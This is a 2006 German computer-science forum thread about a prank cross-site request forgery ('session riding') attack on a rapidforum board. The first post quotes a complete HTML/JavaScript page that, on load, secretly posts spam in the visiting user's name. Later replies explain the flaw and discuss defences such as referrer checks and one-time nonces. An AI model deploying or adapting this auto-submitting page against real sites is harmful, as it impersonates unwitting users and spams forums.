FB18 - Das Forum für Informatik

fb18.de / Off-Topic / Hard- und Softwarefragen

TeyThoon's komische JavaScript-Pwnage

TeyThoon's komische JavaScript-Pwnage 2006-04-25 22:01
Wolf
Wie genau funktioniert das und was sind die Konsequenzen?
(Wenn jemand antworten will, so moege er ein neues Topic aufmachen ;)
Hier ist nochmal der Code:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <title>suessss!</title> <script type="application/x-javascript"> var subject = new Array("", "coole seite", "echt interessant", "muss man gesehen haben", "wow", "genial", "crass", "das ist echt mal was anderes", "der hammer", "juhuhuhu", "schlumpf", "cooool", "boah", "crass alter", "fooooooo", "strange", "ich krich titten", "mann alter ey"); [b]function go() {[/b] document.eingabe.posting_subtitle.value = generateSomeStupidText(); document.eingabe.body.value = generateSomeStupidText() + "\n\n[0wn3d by teythoon]"; [b]document.eingabe.submit();[/b] [b]}[/b] function generateSomeStupidText() { var useTehForceLuke = Math.floor(Math.random() * subject.length); var a = Math.floor(Math.random() * subject.length); var b = Math.floor(Math.random() * subject.length); var c = Math.floor(Math.random() * subject.length); r = subject[useTehForceLuke]; for (var i = 0; i < a; i++) r += "!"; for (var i = 0; i < b; i++) r += "1"; for (var i = 0; i < c; i++) r += "elf"; return r; } </script> </head> [b]<body onload="go()" style="background: black;"> <form name="eingabe" action="http://3773.rapidforum.com/" method="post" />[/b] <input type="hidden" name="area" value="007" /> <input type="hidden" name="topic" value="100775393607" /> <input type="hidden" name="action" value="newposting" /> <input type="hidden" name="dummy" value="topic=100775393607&gotofirstnewposting=1#unten" id="override" /> <input type="hidden" name="text" value="" /> <input type="hidden" name="macher" value="" /> <input type="hidden" name="zeit" value="" /> <input type="hidden" name="posting_subtitle" value="" size="55" maxlength="50" tabindex="1" /> <input type="hidden" name="icon" value="123" checked /> <input type="hidden" name="body" value="" /> <input type="hidden" value="mehr" name="getmore" /> <input type="hidden" value="Fullquote" /> <input type="hidden" value="Shortquote" /> <input type="hidden" name="killeasyhtml" /> <input type="hidden" name="killreplacer" /> <input type="hidden" accesskey="S" value="neuen Beitrag erstellen" name="savenewposting" /> <!--<input type="hidden" value="Vorschau" name="inlinepreview" />--> </form> <center><img src="fish.jpg" alt="" /></center> </body> </html>Das Einzige, was die Seite macht, ist in genau dem Topic nochmal zu posten, indem sie ein HTTP-POST abschickt, das der gewünschten Form entspricht. Wenn man eingeloggt ist und auf den Link klickt, dann ist man auch als Urheber eines solchen "Owned"-Posts zu erkennen, da man ja den Cookie hat. Das ist alles.


Edit: Nervig ist, dass man nur die Topic-ID abändern muss, damit man damit andere Topics vollspammen kann.

Re: TeyThoon's komische JavaScript-Pwnage 2006-04-25 22:25
TriPhoenix
Jup nennt sich Session-Riding und ist teythoon's Spezialität [img]http://www.fb18.de/gfx/28.gif[/img] Technisch habe ich keine Möglichkeit Aufgrund der rapid-Engine daran was zu drehen. Da hilft nur warten auf die neue Engine.

Re: TeyThoon's komische JavaScript-Pwnage 2006-04-25 22:27
Marrow
Was man alles verpasst, wenn man Java-Script aus hat. [img]http://www.fb18.de/gfx/28.gif[/img]


Re: TeyThoon's komische JavaScript-Pwnage 2006-04-26 00:18
Anonymer User
Hallo? Warum wird mein Posting einfach kommentarlos gelöscht? Ich protestiere! Ich wollte damit nur deutlich machen, dass so etwas

http://www.heise.de/newsticker/meldung/54431

bekannter weise möglich ist. Durch deutliche Übertreibung und smilies, habe ich dies verdeutlicht. Damit wollte ich natürlich keine kriminellen Aktivitäten fördern, welche wahrscheinlich mit Freiheitsentzug enden würden. Im Gegenteil, sollte man vielleicht etwas auf der Hut sein…

Re: TeyThoon's komische JavaScript-Pwnage 2006-04-26 00:24
Wolf
Tut's in diesem Fall nicht ein simpler Refer(r)er-Check?

Re: TeyThoon's komische JavaScript-Pwnage 2006-04-26 00:27
Anarch
Warum kann ich meinem firefox nicht sagen, dass er keine forms auto-submitten soll, wenn sie auf andere Domains als die Ursprungsdomain zeigen? *grübel*

Re: TeyThoon's komische JavaScript-Pwnage 2006-04-26 00:30
Marrow
Warum kann ich meinem firefox nicht sagen, dass er keine forms auto-submitten soll, wenn sie auf andere Domains als die Ursprungsdomain zeigen? *grübel*
Könntest vielleicht nach einer entsprechenden Erweiterung suchen.

Re: TeyThoon's komische JavaScript-Pwnage 2006-04-26 00:30
TriPhoenix
Tut's in diesem Fall nicht ein simpler Refer(r)er-Check?

Nein, damit sperrt man die Leute aus, die keinen Referrer senden wollen. Wenn man leere Referrer erlaubt, ist es wiederum trivial, dafür per JavaScript zu sorgen.

Re: TeyThoon's komische JavaScript-Pwnage 2006-04-26 02:38
TeyThoon
referer-check tut es nicht, waere aber schon mal ein anfang… die saubere loesung ist entweder eine explizite authentifizierung oder one time nonces fuer jede transaktion.

Re: TeyThoon's komische JavaScript-Pwnage 2006-04-26 13:39
TriPhoenix
referer-check tut es nicht, waere aber schon mal ein anfang… die saubere loesung ist entweder eine explizite authentifizierung oder one time nonces fuer jede transaktion.

Da ich ja shcon mit anderen Engines liebäugele: Hast du Erfahrungswerte ob/welche Engines sowas schon implementieren?